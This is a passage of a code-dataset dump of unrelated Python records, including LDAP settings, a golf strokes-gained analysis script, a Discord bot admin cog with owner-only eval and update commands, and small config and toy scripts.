True\nAUTH_LDAP_CONNECTION_OPTIONS = {\nldap.OPT_DEBUG_LEVEL: 3,\nldap.OPT_REFERRALS: 0,\n}\n\n\n\n\n\n#AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n# 'ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr',\n# ldap.SCOPE_SUBTREE,\n# '(objectClass=groupOfNames)',\n#)\n#AUTH_LDAP_GROUP_TYPE = NestedGroupOfNamesType()\n#AUTH_LDAP_REQUIRE_GROUP = \"ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\"\n\n#AUTH_LDAP_MIRROR_GROUPS=True\n#AUTH_LDAP_ALWAYS_UPDATE_USER=True\n#AUTH_LDAP_AUTHORIZE_ALL_USERS=True\n#\n#AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n# \"is_active\": \"cn=active,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n# \"is_staff\": \"cn=staff,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n# \"is_superuser\": \"cn=superuser,ou=geonode,dc=ermis-floods-dev,dc=aegean,dc=gr\",\n#}\n\n#AUTH_LDAP_FIND_GROUP_PERMS = True\n#AUTH_LDAP_CONNECTION_OPTIONS = {\n#ldap.OPT_DEBUG_LEVEL: 3,\n#ldap.OPT_REFERRALS: 0,\n#}\n","sub_path":"ermis/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":28563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"218618192","text":"import pandas as pd\nimport numpy as np\nfrom scipy.sparse import csc_matrix\nfrom scipy.spatial.distance import pdist,squareform\nimport math,os,sys,multiprocessing,gc,pickle,itertools\nfrom collections import defaultdict\n \ncols = ('Cat','Year','Round','Permanent_Tournament_#','Course_#','Hole','Start_X_Coordinate','tourn_num',\n 'Start_Y_Coordinate','Distance_from_hole','Strokes_Gained','Time','Par_Value','Player_#',\n 'Player_Last_Name','Player_First_Name')\ndata = pd.concat([pd.read_csv('../GolfData/Shot/%d.csv.gz' % year,usecols=cols) for year in range(2003,2019)])\nlen_before = len(data)\ndata = data.dropna(subset=['Strokes_Gained'])\nprint('Dropped %d shots for missing strokes gained.' % (len_before-len(data),))\n\ne_d,e_t,w_d,p_mult = .8,.7,.8,1.9\n\ncats = {}\ncats['green0'] = 'Cat==\"Green\" & Distance_from_hole<5'\ncats['fringe0'] = 'Cat==\"Fringe\" & Distance_from_hole<5'\ncats['green5'] = 'Cat==\"Green\" & Distance_from_hole>=5 & Distance_from_hole<10'\ncats['fringe5'] = 'Cat==\"Fringe\" & Distance_from_hole>=5 & Distance_from_hole<10'\ncats['green10'] = 'Cat==\"Green\" & Distance_from_hole>=10 & Distance_from_hole<20'\ncats['fringe10'] = 'Cat==\"Fringe\" & Distance_from_hole>=10 & Distance_from_hole<20'\ncats['green20'] = 'Cat==\"Green\" & Distance_from_hole>=20'\ncats['fringe20'] = 'Cat==\"Fringe\" & Distance_from_hole>=20'\ncats['prough0'] = 'Cat==\"Primary Rough\" & Distance_from_hole<90'\ncats['irough0'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole<90'\ncats['prough90'] = 'Cat==\"Primary Rough\" & Distance_from_hole>=90 & Distance_from_hole<375'\ncats['irough90'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole>=90 & Distance_from_hole<375'\ncats['prough375'] = 'Cat==\"Primary Rough\" & Distance_from_hole>=375'\ncats['irough375'] = 'Cat==\"Intermediate Rough\" & Distance_from_hole>=375'\ncats['fairway0'] = 'Cat==\"Fairway\" & Distance_from_hole<300'\ncats['fairway300'] = 'Cat==\"Fairway\" & Distance_from_hole>=300 & Distance_from_hole<540'\ncats['fairway540'] = 'Cat==\"Fairway\" & Distance_from_hole>=540'\ncats['bunker'] = 'Cat==\"Bunker\"'\ncats['tee3'] = 'Cat==\"Tee Box\" & Par_Value==3'\ncats['tee45'] = 'Cat==\"Tee Box\" & (Par_Value==4 | Par_Value==5)'\ncats['other'] = 'Cat==\"Other\"'\n\nmeta_cats = {}\nmeta_cats['tee3'] = ['tee3']\nmeta_cats['tee45'] = ['tee45']\nmeta_cats['green0'] = ['green0','fringe0']\nmeta_cats['green5'] = ['green5','fringe5']\nmeta_cats['green10'] = ['green10','fringe10']\nmeta_cats['green20'] = ['green20','fringe20']\nmeta_cats['rough0'] = ['prough0','irough0']\nmeta_cats['rough90'] = ['prough90','irough90']\nmeta_cats['rough375'] = ['prough375','irough375']\nmeta_cats['fairway0'] = ['fairway0']\nmeta_cats['fairway300'] = ['fairway300']\nmeta_cats['fairway540'] = ['fairway540']\nmeta_cats['bunker'] = ['bunker']\nmeta_cats['other'] = ['other']\n\np_map = {mini_cat:(p_mult/data.query(cats[mini_cat])['Strokes_Gained'].std()\n if not np.isnan(data.query(cats[mini_cat])['Strokes_Gained'].std()) else 3.)\n for mini_cat in cats}\n\nprint(p_map)\n\ndef partition (lst, n):\n return [lst[i::n] for i in range(n)]\n\ndef run_a_slice(slice):\n def sigmoid(x,sig_p):\n m,r = sig_p, sig_p/10.\n return (1./(1. + np.exp(m)**(-x)) + (np.tanh(r*x) + 1.)/2.)/2.\n\n def get_matrix(tournament,conditon,sig_p):\n arr,arr1 = np.zeros((n_players,n_players)),np.zeros((n_players,n_players))\n for (round,course,hole),df in data[data.tourn_num==tournament].groupby(['Round','Course_#','Hole']):\n subset = df.query(condition)[['Start_X_Coordinate','Start_Y_Coordinate','Distance_from_hole',\n 'Strokes_Gained','Time','Player_Index']].values\n num_shots = subset.shape[0]\n dists = squareform(pdist(subset[:,0:2]))\n w_1 = w_1 = 1/(dists/(np.add.outer(subset[:,2],subset[:,2])/2) + .01)**e_d\n w_2 = 1/((np.abs(np.subtract.outer(subset[:,4],subset[:,4]))+5)/100.0)**e_t\n w = w_1*w_d + w_2*(1-w_d)\n np.fill_diagonal(w,0)\n w = np.squeeze(w.reshape(-1,1))\n vals = sigmoid(np.subtract.outer(subset[:,3],subset[:,3]),10.)\n np.fill_diagonal(vals,0)\n vals = np.squeeze(vals.reshape(-1,1))\n inds = (np.repeat(subset[:,5],num_shots).astype(int),\n np.tile(subset[:,5],num_shots).astype(int))\n np.add.at(arr,inds,w*vals)\n np.add.at(arr1,inds,w*.5)\n mat,mat1 = csc_matrix(arr),csc_matrix(arr1)\n return (mat,mat1)\n\n def save_sparse_csc(filename,array):\n np.savez(filename,data=array.data,indices=array.indices,indptr=array.indptr,shape=array.shape)\n return\n\n for tournament in slice:\n print(tournament)\n #tournament += run_a_slice.base_number_tournaments ## for incremental\n for big_cat in meta_cats:\n # if os.path.exists('cats/cats_w-%g-%g-%g/%s_%d.npz' % (e_d,e_t,w_d,big_cat,tournament)):\n # continue\n mat,mat1 = None,None\n for small_cat in meta_cats[big_cat]:\n sig_p = p_map[small_cat]\n condition = cats[small_cat] \n try:\n mat.data\n except:\n mat,mat1 = get_matrix(tournament,condition,sig_p)\n gc.collect()\n else:\n res = get_matrix(tournament,condition,sig_p)\n gc.collect()\n mat += res[0]\n mat1 += res[1]\n save_sparse_csc('cats/cats_w-%g-%g-%g/%s_%d' % (e_d,e_t,w_d,big_cat,tournament),mat)\n save_sparse_csc('cats/cats_w-%g-%g-%g/%s_%d_g' % (e_d,e_t,w_d,big_cat,tournament),mat1)\n #cmd = \"rsync -avL --progress -e \\\"ssh -i /home/ubuntu/aws_ds8key.pem\\\" /home/ubuntu/project/Rank_a_Golfer/cats/cats_w%g-%g-%g-%g ubuntu@ec2-54-162-31-22.compute-1.amazonaws.com:~/project/Rank_a_Golfer/cats/\" % (epsilon*100,e_d,e_t,w_d)\n #os.system(cmd)\n return\n\nif not os.path.exists('cats/cats_w-%s-%s-%s' % (e_d,e_t,w_d)):\n os.makedirs('cats/cats_w-%s-%s-%s' % (e_d,e_t,w_d))\ne_d,e_t,w_d = tuple(map(float,[e_d,e_t,w_d]))\n\nwith open('PickleFiles/num_to_ind_shot.pkl','rb') as pickle_file:\n num_to_ind = pickle.load(pickle_file,encoding='latin1')\n\nfor player_num in data['Player_#'].drop_duplicates():\n if player_num not in num_to_ind:\n num_to_ind[player_num] = len(num_to_ind)\n\nwith open('PickleFiles/num_to_ind_shot.pkl','wb') as pickle_file:\n pickle.dump(num_to_ind,pickle_file)\n\ndata.insert(5,'Player_Index',[num_to_ind[num] for num in data['Player_#']])\nname_to_ind = {}\nfor tup in data[['Player_Last_Name','Player_First_Name','Player_Index']].values:\n if tuple(tup[0:2]) in name_to_ind:\n if name_to_ind[tuple(tup[0:2])]!=tup[2]:\n for counter in range(10):\n key = tuple([tup[0],tup[1]+''.join(['*' for _ in range(counter)])])\n if key in name_to_ind and name_to_ind[key]==tup[2]:\n break\n else:\n for counter in range(10):\n key = tuple([tup[0],tup[1]+''.join(['*' for _ in range(counter)])])\n if key not in name_to_ind:\n break\n print(tuple(tup[0:2]),'is duped, inserting', key)\n print(name_to_ind[tuple(tup[0:2])],tup[2])\n name_to_ind[key] = tup[2]\n else:\n name_to_ind[tuple(tup[0:2])] = tup[2]\nwith open('PickleFiles/name_to_ind_shot.pkl','wb') as pickle_file:\n pickle.dump(name_to_ind,pickle_file,protocol=2)\nn_players = len(num_to_ind)\nprint(n_players)\ndata.Time = data.Time.values/100 * 60 + data.Time.values%100\n\nn_tournaments = len(pd.unique(data.tourn_num))\n\n#num_cores = multiprocessing.cpu_count()-2\nnum_cores = 3\nslices = partition(range(n_tournaments),num_cores)\npool = multiprocessing.Pool(num_cores)\nresults = pool.map(run_a_slice, slices)\npool.close()\n\n","sub_path":"save_blocks.py","file_name":"save_blocks.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187342602","text":"import asyncio\nimport contextlib\nimport json\nimport logging\nimport sys\nfrom io import StringIO\nfrom typing import Generator, Optional, cast\n\nimport nextcord\nfrom nextcord.ext import commands\n\nfrom ..classes.converters import Required\nfrom ..classes.embed import Embed, PaginationEmbed\nfrom ..helpers.constants import ICONS\nfrom ..helpers.log import Log\nfrom ..helpers.utils import convert_to_seconds, shell_exec\n\nlog = cast(Log, logging.getLogger(__name__))\n\n\n@contextlib.contextmanager\ndef stdout_io() -> Generator[StringIO, None, None]:\n old = sys.stdout\n stdout = StringIO()\n sys.stdout = stdout\n yield stdout\n sys.stdout = old\n\n\nclass Administration(commands.Cog):\n \"\"\"Administration commands that handles the management of the bot\"\"\"\n\n def __init__(self, bot) -> None:\n self.bot = bot\n self.session = self.bot.session\n self.db = self.bot.db\n\n @commands.command()\n @commands.is_owner()\n async def eval(self, ctx: commands.Context, *, code: str) -> None:\n \"\"\"Evaluates a line/s of python code. *BOT_OWNER\"\"\"\n\n guild_id = ctx.guild.id if ctx.guild else None\n\n variables = {\n \"bot\": self.bot,\n \"nextcord\": nextcord,\n \"commands\": commands,\n \"ctx\": ctx,\n \"players\": self.bot.music,\n \"player\": self.bot.music.get(guild_id),\n \"guild\": self.db.get_guild(guild_id),\n \"rooms\": self.bot.game,\n \"room\": self.bot.game.get(guild_id),\n \"Embed\": Embed,\n \"send_to_all_owners\": self.bot.send_to_all_owners,\n \"p\": print,\n }\n\n if code.startswith(\"```\") and code.endswith(\"```\"):\n code = \"\\n\".join(code.splitlines()[1:-1])\n\n try:\n lines = \"\\n\".join([f\" {i}\" for i in code.splitlines()])\n\n with stdout_io() as s:\n exec(f\"async def x():\\n{lines}\\n\", variables)\n await eval(\"x()\", variables)\n output = s.getvalue()\n except Exception as e:\n output = str(e)\n await ctx.message.add_reaction(\"❌\")\n else:\n await ctx.message.add_reaction(\"👌\")\n\n if output:\n msg_array = [output[i: i + 1900] for i in range(0, len(output), 1900)]\n\n embeds = [Embed(\"```py\\n\" + msg.strip(\"\\n\") + \"```\") for msg in msg_array]\n\n pagination = PaginationEmbed(ctx, embeds=embeds)\n pagination.embed.set_author(\n name=\"Python Interpreter\", icon_url=ICONS['python']\n )\n pagination.embed.set_footer(\n text=f\"Executed by {ctx.author}\", icon_url=ctx.author.display_avatar\n )\n await pagination.build()\n\n @commands.command()\n @commands.is_owner()\n async def generatelog(self, ctx: commands.Context) -> None:\n \"\"\"Generates a link contains the content of debug.log. *BOT_OWNER\"\"\"\n\n if not self.bot.env.str(\"PASTEBIN_API\"):\n await ctx.send(embed=Embed(\"Error. Pastebin API not found.\"))\n return\n\n with open(\"./debug.log\", \"r\") as f:\n text = f.read()\n res = await self.session.post(\n \"https://pastebin.com/api/api_post.php\",\n data={\n \"api_dev_key\": self.bot.env.str(\"PASTEBIN_API\"),\n \"api_paste_code\": text,\n \"api_option\": \"paste\",\n \"api_paste_private\": 1,\n \"paste_expire_date\": \"10M\",\n },\n )\n paste_link = await res.text()\n paste_id = paste_link.split(\"/\")[-1]\n await ctx.send(\n embed=Embed(f\"Generated pastebin: https://pastebin.com/raw/{paste_id}\")\n )\n\n @commands.command()\n @commands.has_guild_permissions(manage_messages=True)\n @commands.guild_only()\n async def prune(\n self,\n ctx: commands.Context,\n member: Optional[nextcord.Member] = None,\n count: int = 1,\n ) -> None:\n \"\"\"Deletes a number of messages of a specific member (if specified). *MANAGE_MESSAGES\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n\n if guild.get('deleteoncmd'):\n await self.bot.delete_message(ctx.message)\n\n async for message in ctx.history(limit=1000 if member else count):\n if count <= 0:\n break\n\n if not member or message.author == member:\n await self.bot.delete_message(message)\n count -= 1\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def prefix(self, ctx: commands.Context, prefix: str) -> None:\n \"\"\"Sets the prefix of the current server. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n await guild.update({'prefix': prefix})\n\n await ctx.send(embed=Embed(f\"Prefix is now set to `{guild.get('prefix')}`.\"))\n\n @commands.command()\n @commands.is_owner()\n async def setstatus(\n self,\n ctx: commands.Context,\n status: Required(\"online\", \"offline\", \"dnd\", \"idle\"), # type:ignore\n ) -> None:\n \"\"\"Sets the status of the bot. *BOT_OWNER\"\"\"\n\n if status is False:\n return\n\n await self.bot.settings.update({'status': status})\n\n await self.bot.change_presence(status=nextcord.Status[self.bot.settings.get('status')])\n await ctx.send(embed=Embed(f\"Status is now set to {self.bot.settings.get('status')}.\"))\n\n @commands.command()\n @commands.is_owner()\n async def setpresence(\n self,\n ctx: commands.Context,\n presence_type: Required(\"watching\", \"listening\", \"playing\"), # type:ignore\n *,\n name: str,\n ) -> None:\n \"\"\"Sets the presence of the bot. *BOT_OWNER\"\"\"\n\n if presence_type is False:\n return\n\n self.bot.settings.set('game', {\n 'type': presence_type,\n 'name': name\n })\n await self.bot.settings.save()\n\n await self.bot.change_presence(\n activity=nextcord.Activity(\n name=name, type=nextcord.ActivityType[self.bot.settings.get('game.type')]\n )\n )\n await ctx.send(\n embed=Embed(\n f\"Presence is now set to {self.bot.settings.get('game.type')} {self.bot.settings.get('game.name')}.\"\n )\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def alias(self, ctx: commands.Context, name: str, *, command: str) -> None:\n \"\"\"Sets or updates an alias command. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n aliases = guild.get('aliases')\n ids = [i for i, x in enumerate(aliases) if x.name == name]\n\n if any(ids):\n if int(aliases[ids[0]].owner) != ctx.author.id and await self.bot.is_owner(ctx.author):\n await ctx.send(\n embed=Embed(\"You are not the owner of the alias.\"), delete_after=5\n )\n return\n\n aliases[ids[0]].cmd = (\n command.replace(ctx.prefix, \"{0}\", 1)\n if command.startswith(ctx.prefix)\n else command\n )\n else:\n aliases.append(\n {\"name\": name, \"cmd\": command, \"owner\": ctx.author.id}\n )\n\n await guild.update({'aliases': aliases})\n await ctx.send(\n embed=Embed(f\"Message with exactly `{name}` will now execute `{command}`\"),\n delete_after=10,\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def deletealias(self, ctx: commands.Context, name: str) -> None:\n \"\"\"Removes an alias command. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n aliases = guild.get('aliases')\n\n ids = [i for i, x in enumerate(aliases) if x.name == name]\n\n if not ids:\n await ctx.send(embed=Embed(\"Alias doesn't exists.\"), delete_after=5)\n return\n\n if int(aliases[ids[0]].owner) != ctx.author.id and await self.bot.is_owner(\n ctx.author\n ):\n await ctx.send(\n embed=Embed(\"You are not the owner of the alias.\"), delete_after=5\n )\n return\n\n del aliases[ids[0]]\n\n await guild.update({'aliases': aliases})\n await ctx.send(embed=Embed(f\"Alias`{name}` has been deleted.\"), delete_after=5)\n\n @commands.command()\n @commands.is_owner()\n @commands.guild_only()\n async def deleteoncmd(self, ctx: commands.Context) -> None:\n \"\"\"\n Enables/Disables the deletion of message after execution. *BOT_OWNER\n \"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n await guild.update({'deleteoncmd': not guild.get('deleteoncmd')})\n\n await ctx.send(\n embed=Embed(\n f\"Delete on command is now set to {'enabled' if guild.get('deleteoncmd') else 'disabled'}.\"\n )\n )\n\n @commands.command()\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def voicetts(self, ctx: commands.Context) -> None:\n \"\"\"Enables/Disables Voice TTS. *ADMINISTRATOR\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.voicetts', ctx.channel.id if guild.get('channel.voicetts') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.voicetts'):\n await ctx.send(embed=Embed(\"Voice TTS is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Voice TTS is now disabled.\"))\n\n @commands.group(invoke_without_command=True)\n @commands.has_guild_permissions(administrator=True)\n @commands.guild_only()\n async def logger(self, ctx: commands.Context) -> None:\n \"\"\"Enables/Disables Logger. *ADMINISTRATOR\"\"\"\n\n await ctx.send(embed=Embed(\"Incomplete command. \"))\n\n @logger.command(name=\"presence\")\n async def logger_presence(self, ctx: commands.Context) -> None:\n \"\"\"Logs presence when someone joins/leaves the guild or voice channel and status updates.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.presence_log',\n ctx.channel.id if guild.get('channel.presence_log') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.presence_log'):\n await ctx.send(embed=Embed(\"Logger Presence is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Presence is now disabled.\"))\n\n @logger.command(name=\"voice\")\n async def logger_voice(self, ctx: commands.Context) -> None:\n \"\"\"Logs presence when someone joins/leaves the voice channel.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.voice_log', ctx.channel.id if guild.get('channel.voice_log') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.voice_log'):\n await ctx.send(embed=Embed(\"Logger Voice is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Voice is now disabled.\"))\n\n @logger.command(name=\"message\")\n async def logger_message(self, ctx: commands.Context) -> None:\n \"\"\"Logs messages when someone delete his message.\"\"\"\n\n guild = self.db.get_guild(ctx.guild.id)\n guild.set('channel.msgdelete', ctx.channel.id if guild.get('channel.msgdelete') != ctx.channel.id else None)\n await guild.save()\n\n if guild.get('channel.msgdelete'):\n await ctx.send(embed=Embed(\"Logger Message is now set to this channel.\"))\n else:\n await ctx.send(embed=Embed(\"Logger Message is now disabled.\"))\n\n @commands.command()\n @commands.is_owner()\n async def update(self, ctx: commands.Context) -> None:\n \"\"\"Updates the bot from github. *BOT_OWNER\"\"\"\n\n result = await shell_exec(\"git pull\")\n\n embed = Embed()\n embed.set_author(\n name=\"Github Update\",\n icon_url=ICONS[\"github\"]\n )\n\n embed.description = result\n\n await ctx.send(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def pipupdate(self, ctx: commands.Context) -> None:\n \"\"\"Updates the package of the bot. *BOT_OWNER\"\"\"\n\n msg = await ctx.send(embed=Embed(\"Bot packages updating...\"))\n\n embed = Embed()\n embed.set_author(name=\"Pipenv Update\", icon_url=ICONS['pip'])\n\n embed.description = await self.bot.update_package('nextcord', 'yt-dlp')\n\n await msg.edit(embed=embed)\n\n @commands.command()\n @commands.is_owner()\n async def reload(self, ctx: commands.Context, *, ext: str = None) -> None:\n \"\"\"Reloads a specific or all extension. *BOT_OWNER\"\"\"\n\n extensions = self.bot.extensions.keys() if ext is None else [\"neonbot.cogs.\" + ext]\n\n try:\n for extension in list(extensions):\n self.bot.reload_extension(extension)\n except Exception as e:\n await ctx.send(embed=Embed(str(e)))\n else:\n msg = \"Reloaded all modules\" if ext is None else f\"Reloaded module: {ext}.\"\n log.info(msg)\n await ctx.send(embed=Embed(msg))\n\n @commands.command()\n @commands.is_owner()\n async def restart(self, ctx: commands.Context) -> None:\n \"\"\"Restarts bot. *BOT_OWNER\"\"\"\n\n self.bot.save_music()\n msg = await ctx.send(embed=Embed(\"Bot Restarting...\"))\n with open(\"./tmp/restart_config.json\", \"w\") as f:\n json.dump({\"message_id\": msg.id, \"channel_id\": ctx.channel.id}, f, indent=4)\n await self.bot.restart()\n\n @commands.command()\n @commands.has_guild_permissions(mute_members=True)\n async def servermute(self, ctx: commands.Context, member: nextcord.Member, time: str, *, reason: str = \"\") -> None:\n \"\"\"Server mute with timer.\"\"\"\n\n if member.voice is None:\n await ctx.send(embed=Embed(f\"{member} is not in voice.\"))\n return\n\n if member.voice.mute is True:\n await ctx.send(embed=Embed(f\"{member} is already muted.\"))\n return\n\n seconds = convert_to_seconds(time)\n\n await member.edit(mute=True, reason=reason)\n await ctx.send(embed=Embed(f\"{member} has been muted for {seconds} seconds.\"))\n\n async def unmute():\n await asyncio.sleep(seconds)\n if member.voice.mute is True:\n await member.edit(mute=False, reason='Revert unmute')\n await ctx.send(embed=Embed(f\"{member} is now unmuted.\"))\n\n self.bot.loop.create_task(unmute())\n\n @commands.command()\n @commands.has_guild_permissions(mute_members=True)\n async def serverunmute(self, ctx: commands.Context, member: nextcord.Member, *, reason: str = \"\") -> None:\n \"\"\"Server unmute.\"\"\"\n\n if member.voice is None:\n await ctx.send(embed=Embed(f\"{member} is not in voice.\"))\n return\n\n if member.voice.mute is False:\n await ctx.send(embed=Embed(f\"{member} is already unmuted.\"))\n return\n\n await member.edit(mute=False, reason=reason)\n await ctx.send(embed=Embed(f\"{member} has been unmuted.\"))\n\n\ndef setup(bot: commands.Bot) -> None:\n bot.add_cog(Administration(bot))\n","sub_path":"neonbot/cogs/administration.py","file_name":"administration.py","file_ext":"py","file_size_in_byte":15399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"640369273","text":"# import necessary packages\nfrom os import path\n\nDATASETS_DIR = \"dataset\"\nSCRIPTS_DIR = \"scripts\"\nHELPERS_DIR = \"helpers\"\nMODELS_DIR = \"models\"\nOUTPUT_DIR = \"output\"\nIMAGES_DIR = path.sep.join([OUTPUT_DIR, \"images\"])\nLABELS_DIR = path.sep.join([OUTPUT_DIR, \"labels\"])\n\nDATASET_NAME = \"ukbench100\"\nINPUT_DB_NAME = \"inputs.hdf5\"\nOUTPUT_DB_NAME = \"outputs.hdf5\"\nMODEL_NAME = \"srcnn.model\"\nPLOT_NAME = \"plot.png\"\n\nDATASET_PATH = path.sep.join([DATASETS_DIR, DATASET_NAME])\nINPUT_DB_PATH = path.sep.join([OUTPUT_DIR, INPUT_DB_NAME])\nOUTPUT_DB_PATH = path.sep.join([OUTPUT_DIR, OUTPUT_DB_NAME])\nMODEL_PATH = path.sep.join([MODELS_DIR, MODEL_NAME])\nPLOT_PATH = path.sep.join([OUTPUT_DIR, PLOT_NAME])\n\n# initialize the batch size and number of epochs for training\nBATCH_SIZE = 32\nNUM_EPOCHS = 10\n\n# initialize the scale and the input dimensions\nSCALE = 2.0\nINPUT_DIM = 33\n\n# the label size should ne the output spatial dimensions of\n# the srcnn, while the padding ensures we properly crop the labels\n# ROI\nLABEL_SIZE = 21\nPAD = int((INPUT_DIM - LABEL_SIZE) / 2.0)\n\n# the stride controls the step size of the sliding window\nSTRIDE = 14\n\nBUILD_ENABLED = False\nBUILD_SCRIPT = path.sep.join([SCRIPTS_DIR, \"build_dataset.py\"])\nBUILD_DESC = \"build the dataset\"\nBUILD_ARGS = [[\"input-images\", DATASET_PATH],\n [\"labels\", LABELS_DIR],\n [\"output-images\", IMAGES_DIR],\n [\"input-db\", INPUT_DB_PATH],\n [\"output-db\", OUTPUT_DB_PATH],\n [\"scale\", SCALE],\n [\"input-dim\", INPUT_DIM],\n [\"stride\", STRIDE],\n [\"padding\", PAD],\n [\"label-size\", LABEL_SIZE]]\n\nTRAIN_ENABLED = True\nTRAIN_SCRIPT = path.sep.join([SCRIPTS_DIR, \"train_model.py\"])\nTRAIN_DESC = \"train the model to upgrade the resolution of pictures\"\nTRAIN_ARGS = [[\"input-db\", INPUT_DB_PATH],\n [\"output-db\", OUTPUT_DB_PATH],\n [\"input-dim\", INPUT_DIM],\n [\"batch-size\", BATCH_SIZE],\n [\"epochs\", NUM_EPOCHS],\n [\"model-path\", MODEL_PATH],\n [\"plot-path\", PLOT_PATH]]\n","sub_path":"DNN/dnn-improc/image-super-resolution/conf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"535983611","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/pybasic/__main__.py\n# Compiled at: 2019-04-20 06:42:58\n# Size of source mod 2**32: 1304 bytes\nimport argparse, pickle, sys\nfrom .basic_yacc import ast, parser, root_stack\nfrom .utils import BasicError\nfrom .pybasic import *\n\ndef main():\n arg_parser = argparse.ArgumentParser(description='Execute pybasic programs, or start an REPL session.')\n arg_parser.add_argument('program_name', nargs='?', help='The path of the source program to execute. If not specified, an REPL session will be started.')\n arg_parser.add_argument('-a', '--ast', action='store_true', dest='ast', help='Execute a binary abstract syntax tree file rather than a source program. This will be ignored in REPL mode. ')\n arg_parser.add_argument('-s', '--save', action='store', dest='ast_path', help='Save the binary abstract syntax tree of the source program to the given path. The source program will not be executed. This will be ignored in REPL mode. ')\n args = arg_parser.parse_args()\n if not args.program_name:\n repl()\n else:\n if args.ast_path:\n save_ast(args.program_name, args.ast_path)\n return\n if args.ast:\n execute_ast(args.program_name)\n return\n execute(args.program_name)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/ply_pybasic-1.0-py3.7/__main__.cpython-37.py","file_name":"__main__.cpython-37.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647840567","text":"from datetime import datetime\nfrom sys import argv\nfrom typing import Dict\n\n# Custom types:\nPuns = Dict[str, str]\n\n\nclass ContentUpdate:\n\n multiplier: float = 1\n\n def __init__(self, author: str, days_to_event: int) -> None:\n self.author: str = author\n self.days_to_event: int = days_to_event\n\n\nclass LectureUpdate(ContentUpdate):\n pass\n\n\nclass LabUpdate(ContentUpdate):\n\n multiplier = 0.5\n\n\nclass Meggie:\n name: str = \"Meggie\"\n base_coffee_need: int = 2\n total_content_cost: float = 0\n\n def __init__(self, time_in: int) -> None:\n self.time_in: int = time_in\n\n def compute_puns(self, puns: Puns) -> None:\n pun_factor: int = 1\n pun_cost: int = 0\n for punster, pun in puns.items():\n if punster == \"Romain\":\n pun_factor += 2\n pun_cost += len(punster) + pun_factor * len(pun)\n\n self.pun_cost = pun_cost\n\n def compute_content_update(self, content_update: ContentUpdate) -> None:\n content_cost: float = 2 / (content_update.days_to_event + 1)\n if content_update.author == \"Romain\":\n content_cost += 1\n content_cost = content_cost * content_update.multiplier\n self.total_content_cost = content_cost\n\n def compute_day_of_week(self, date: datetime) -> float:\n day: int = date.weekday()\n if day > 5:\n return 0\n else:\n day_cost: float = day / 1.5\n return day_cost\n\n def meggulate(self) -> float:\n coffee_needed: float = float(self.base_coffee_need)\n coffee_needed += max(10 - self.time_in, 0) * 0.75\n coffee_needed += self.pun_cost * 0.01\n coffee_needed += self.total_content_cost\n return coffee_needed\n\n\ntime_in: int = int(argv[1])\nmeggie: Meggie = Meggie(time_in)\npuns: Puns = {\n \"Henry\": \"Romain's puns are better percolate than never\",\n \"Romain\": \"My coffee jokes have never bean better\",\n \"Ashley\": \"Romain's coffee puns are esprecious\",\n}\nmeggie.compute_puns(puns)\nmeggie.compute_content_update(LectureUpdate(\"Romain\", 2))\nmeggie.compute_content_update(LabUpdate(\"Ashley\", 7))\ncoffee_needed: float = meggie.meggulate()\ncoffee_needed += meggie.compute_day_of_week(datetime.today())\ncoffee_needed = round(coffee_needed, 1)\nprint(f\"{meggie.name} needs {coffee_needed} cups of coffee.\")\n","sub_path":"meggulator/06_meggulator_custom_type.py","file_name":"06_meggulator_custom_type.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245620811","text":"import httpbin\nfrom werkzeug.serving import BaseWSGIServer\n\n\ndef start_app(app, ssl):\n server = BaseWSGIServer(host='localhost', port=0, app=app)\n server.my_extra = None\n thread = threading.Thread(target=server.serve_forever, daemon=True)\n thread.start()\n return server\n\nhttp_port = start_app(httpbin.app, 